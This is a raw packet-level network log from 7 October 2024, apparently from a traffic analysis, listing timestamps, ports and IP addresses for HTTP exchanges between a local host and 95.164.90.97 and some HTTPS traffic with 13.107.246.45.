Oct 7, 2024 03:15:41.702641964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702658892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702686071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702687025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702699900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702714920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702729940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702739954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702755928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702756882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702781916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702785969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702802896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702826977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702830076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702841997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702857018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702874899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702881098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702894926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702909946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702910900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702924967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702940941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702946901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.702956915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.702982903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703010082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703018904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703032970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703048944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703063965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703063965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703080893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703099012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703109980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703150988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703155994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703166008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703183889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703198910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703203917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703214884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703229904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703253031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703258038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703273058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703289032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703304052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703313112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703330040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703339100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703346014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703362942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703366041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703380108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.703416109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.703455925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721044064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721148968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721170902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721227884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721230030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721285105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721290112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721343040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721343040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721376896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721398115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721429110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721435070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721466064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721482038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721499920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721518040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721553087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721553087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721595049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721601963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721646070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721647978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721679926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721699953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721714973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721734047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721746922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721764088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721780062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721798897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721812963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721829891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721846104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721863985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721880913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721898079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.721971035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.721992970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722003937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722037077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722043991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722054005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722069025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722081900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722104073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722124100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722140074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722160101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722174883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722194910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722210884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722233057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722244978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722261906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722279072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722297907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722311974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722342014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722343922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722378969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722398043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722413063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722433090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722446918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722475052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722484112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.722501040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.722537041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.756556034 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.758599997 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.758646965 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.769149065 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.769186020 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.792805910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.792867899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.792900085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.792953968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793009996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793015003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793015003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793015003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793049097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793064117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793073893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793116093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793116093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793167114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793170929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793215990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793220043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793268919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793277025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793323994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793328047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793375015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793380022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793423891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793428898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793483973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793498993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793553114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793581009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793591976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793617964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793632030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793641090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793667078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793690920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793721914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793723106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793772936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793777943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793806076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793827057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793840885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793864012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793874025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793895006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793906927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793920994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793940067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.793962955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.793972969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794003010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794004917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794029951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794039011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794063091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794070959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794097900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794104099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794123888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794137001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794159889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794189930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794197083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794222116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794244051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794258118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794275045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794291019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794315100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794339895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794358015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794372082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794394970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794404984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794425964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794436932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794461966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794471025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794491053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794503927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794527054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794538021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794567108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794567108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794591904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794600010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794625044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794635057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794656038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794667959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794692039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794701099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794723988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794733047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794753075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794765949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794791937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794799089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794817924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794831991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794847012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794866085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794887066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794903040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794924974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794935942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794959068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.794970036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.794991970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.795028925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.821785927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:41.826621056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:41.870402098 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.870472908 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.870546103 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.870587111 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.870611906 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.870675087 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.870980978 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.870996952 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.871010065 CEST	49847	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.871017933 CEST	443	49847	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.875176907 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.875252962 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:41.875370979 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.875616074 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:41.875643969 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:42.028529882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028660059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028693914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028748989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028801918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028821945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028821945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028821945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028851032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028855085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028855085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028907061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028924942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028942108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028975010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.028994083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.028997898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029045105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029052019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029079914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029100895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029166937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029176950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029228926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029234886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029263973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029284000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029314995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029320002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029346943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029371023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029397964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029400110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029434919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029452085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029488087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029508114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029553890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029556990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029607058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029608965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029638052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029658079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029670954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029695034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029715061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029719114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029766083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029773951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029798031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029818058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029849052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029855013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029881001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029905081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029915094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029933929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.029968023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.029969931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030002117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030019045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030039072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030057907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030073881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030095100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030124903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030128002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030177116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030179024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030237913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030249119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030289888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.030292034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.030323982 CEST	80	49782	95.164.90.97	192.168.2.5
